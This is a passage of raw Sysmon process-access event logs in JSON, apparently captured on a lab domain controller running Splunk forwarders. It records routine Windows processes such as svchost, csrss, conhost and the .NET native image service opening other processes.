C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8404,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8405,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8406,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8407,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-00105C371000}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-00105C371000}","TargetProcessId":"4044","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8408,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-21BE-5F25-0000-0010EAD50900}\r\nSourceProcessId: 4748\r\nSourceThreadId: 4808\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010F3A31000}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-21BE-5F25-0000-0010EAD50900}","SourceProcessId":"4748","SourceThreadId":"4808","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010F3A31000}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8409,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010F3A31000}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010F3A31000}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8410,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22CF-5F25-0000-00108A951100}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22CF-5F25-0000-00108A951100}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8411,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.428\r\nSourceProcessGUID: {41C8662E-22CF-5F25-0000-00107A941100}\r\nSourceProcessId: 4044\r\nSourceThreadId: 4840\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.428","SourceProcessGUID":"{41C8662E-22CF-5F25-0000-00107A941100}","SourceProcessId":"4044","SourceThreadId":"4840","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program 